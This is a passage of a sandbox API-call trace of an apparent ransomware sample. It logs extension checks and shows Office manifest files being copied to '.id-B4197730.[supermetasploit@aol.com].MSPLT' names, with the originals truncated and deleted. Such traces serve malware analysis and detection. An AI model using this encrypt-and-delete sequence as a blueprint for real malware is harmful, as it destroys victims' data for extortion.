lpString2="XML") returned -1 [0175.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.854] lstrlenW (lpString=".dbf") returned 4 [0175.854] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0175.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.854] lstrlenW (lpString=".1cd") returned 4 [0175.854] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0175.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.854] lstrlenW (lpString=".jpg") returned 4 [0175.854] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0175.855] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0175.855] lstrlenW (lpString="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 53 [0175.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0175.897] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=1533) returned 1 [0175.897] CloseHandle (hObject=0x2e8) returned 1 [0175.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml")) returned 0x220 [0175.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0175.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0175.898] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0175.898] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0175.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0175.901] GetLastError () returned 0x0 [0175.901] ReadFile (in: hFile=0x348, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x5fd, lpOverlapped=0x0) returned 1 [0176.012] WriteFile (in: hFile=0x37c, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x600, lpOverlapped=0x0) returned 1 [0176.013] ReadFile (in: hFile=0x348, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0176.013] WriteFile (in: hFile=0x37c, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0176.013] SetEndOfFile (hFile=0x37c) returned 1 [0176.014] CloseHandle (hObject=0x37c) returned 1 [0176.015] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0176.015] SetEndOfFile (hFile=0x348) returned 1 [0176.017] CloseHandle (hObject=0x348) returned 1 [0176.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0176.017] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml")) returned 1 [0176.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.018] lstrlenW (lpString=".doc") returned 4 [0176.018] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0176.018] lstrlenW (lpString=".docx") returned 5 [0176.018] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0176.018] lstrlenW (lpString=".pdf") returned 4 [0176.018] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0176.018] lstrlenW (lpString=".xls") returned 4 [0176.018] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0176.018] lstrlenW (lpString=".xlsx") returned 5 [0176.018] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0176.018] lstrlenW (lpString=".ppt") returned 4 [0176.018] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0176.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.018] lstrlenW (lpString=".zip") returned 4 [0176.018] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0176.018] lstrlenW (lpString=".rar") returned 4 [0176.018] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0176.018] lstrlenW (lpString=".bz2") returned 4 [0176.018] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0176.018] lstrlenW (lpString=".7z") returned 3 [0176.019] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0176.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.019] lstrlenW (lpString=".dbf") returned 4 [0176.019] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0176.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.019] lstrlenW (lpString=".1cd") returned 4 [0176.019] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0176.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.019] lstrlenW (lpString=".jpg") returned 4 [0176.019] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0176.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.019] lstrlenW (lpString=".doc") returned 4 [0176.019] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0176.019] lstrlenW (lpString=".docx") returned 5 [0176.019] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0176.019] lstrlenW (lpString=".pdf") returned 4 [0176.019] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0176.019] lstrlenW (lpString=".xls") returned 4 [0176.019] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0176.019] lstrlenW (lpString=".xlsx") returned 5 [0176.019] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0176.019] lstrlenW (lpString=".ppt") returned 4 [0176.019] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0176.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.019] lstrlenW (lpString=".zip") returned 4 [0176.020] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0176.020] lstrlenW (lpString=".rar") returned 4 [0176.020] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0176.020] lstrlenW (lpString=".bz2") returned 4 [0176.020] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0176.020] lstrlenW (lpString=".7z") returned 3 [0176.020] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0176.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.020] lstrlenW (lpString=".dbf") returned 4 [0176.020] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0176.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.020] lstrlenW (lpString=".1cd") returned 4 [0176.020] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0176.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0176.020] lstrlenW (lpString=".jpg") returned 4 [0176.020] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0176.020] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0176.020] lstrlenW (lpString="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 53 [0176.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0176.021] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=1261) returned 1 [0176.021] CloseHandle (hObject=0x348) returned 1 [0176.021] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml")) returned 0x220 [0176.021] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0176.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0176.021] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0176.021] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0176.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0176.022] GetLastError () returned 0x0 [0176.022] ReadFile (in: hFile=0x348, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x4ed, lpOverlapped=0x0) returned 1 [0176.061] WriteFile (in: hFile=0x37c, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x4f0, lpOverlapped=0x0) returned 1 [0176.062] ReadFile (in: hFile=0x348, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0176.062] WriteFile (in: hFile=0x37c, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0176.062] SetEndOfFile (hFile=0x37c) returned 1 [0176.062] CloseHandle (hObject=0x37c) returned 1 [0176.064] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0176.064] SetEndOfFile (hFile=0x348) returned 1 [0176.065] CloseHandle (hObject=0x348) returned 1 [0176.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0176.065] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml")) returned 1 [0176.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.066] lstrlenW (lpString=".doc") returned 4 [0176.066] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0176.066] lstrlenW (lpString=".docx") returned 5 [0176.066] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0176.066] lstrlenW (lpString=".pdf") returned 4 [0176.066] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0176.066] lstrlenW (lpString=".xls") returned 4 [0176.066] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0176.066] lstrlenW (lpString=".xlsx") returned 5 [0176.066] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0176.066] lstrlenW (lpString=".ppt") returned 4 [0176.066] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0176.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.066] lstrlenW (lpString=".zip") returned 4 [0176.066] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0176.066] lstrlenW (lpString=".rar") returned 4 [0176.066] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0176.066] lstrlenW (lpString=".bz2") returned 4 [0176.066] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0176.066] lstrlenW (lpString=".7z") returned 3 [0176.066] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0176.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.066] lstrlenW (lpString=".dbf") returned 4 [0176.066] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0176.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.066] lstrlenW (lpString=".1cd") returned 4 [0176.066] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0176.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.066] lstrlenW (lpString=".jpg") returned 4 [0176.066] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0176.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.067] lstrlenW (lpString=".doc") returned 4 [0176.067] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0176.067] lstrlenW (lpString=".docx") returned 5 [0176.067] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0176.067] lstrlenW (lpString=".pdf") returned 4 [0176.067] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0176.067] lstrlenW (lpString=".xls") returned 4 [0176.067] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0176.067] lstrlenW (lpString=".xlsx") returned 5 [0176.067] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0176.067] lstrlenW (lpString=".ppt") returned 4 [0176.067] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0176.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.067] lstrlenW (lpString=".zip") returned 4 [0176.067] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0176.067] lstrlenW (lpString=".rar") returned 4 [0176.067] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0176.067] lstrlenW (lpString=".bz2") returned 4 [0176.067] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0176.067] lstrlenW (lpString=".7z") returned 3 [0176.067] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0176.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.067] lstrlenW (lpString=".dbf") returned 4 [0176.067] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0176.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.067] lstrlenW (lpString=".1cd") returned 4 [0176.067] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0176.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0176.068] lstrlenW (lpString=".jpg") returned 4 [0176.068] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0176.068] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0176.068] lstrlenW (lpString="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 53 [0176.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0176.070] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=496513) returned 1 [0176.070] CloseHandle (hObject=0x344) returned 1 [0176.070] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml")) returned 0x220 [0176.070] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0176.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0176.070] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0176.070] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0176.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0176.070] GetLastError () returned 0x0 [0176.071] ReadFile (in: hFile=0x344, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x79381, lpOverlapped=0x0) returned 1 [0176.082] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x79390, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x79390, lpOverlapped=0x0) returned 1 [0176.530] ReadFile (in: hFile=0x344, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0176.531] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0176.531] SetEndOfFile (hFile=0x2fc) returned 1 [0176.531] CloseHandle (hObject=0x2fc) returned 1 [0176.547] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0176.547] SetEndOfFile (hFile=0x344) returned 1 [0176.558] CloseHandle (hObject=0x344) returned 1 [0176.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0177.197] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml")) returned 1 [0177.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.204] lstrlenW (lpString=".doc") returned 4 [0177.204] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.204] lstrlenW (lpString=".docx") returned 5 [0177.205] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.205] lstrlenW (lpString=".pdf") returned 4 [0177.205] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.205] lstrlenW (lpString=".xls") returned 4 [0177.205] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.205] lstrlenW (lpString=".xlsx") returned 5 [0177.205] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.205] lstrlenW (lpString=".ppt") returned 4 [0177.205] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.205] lstrlenW (lpString=".zip") returned 4 [0177.205] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.205] lstrlenW (lpString=".rar") returned 4 [0177.205] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.205] lstrlenW (lpString=".bz2") returned 4 [0177.205] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.205] lstrlenW (lpString=".7z") returned 3 [0177.205] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.205] lstrlenW (lpString=".dbf") returned 4 [0177.205] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.205] lstrlenW (lpString=".1cd") returned 4 [0177.205] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.205] lstrlenW (lpString=".jpg") returned 4 [0177.205] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.205] lstrlenW (lpString=".doc") returned 4 [0177.205] 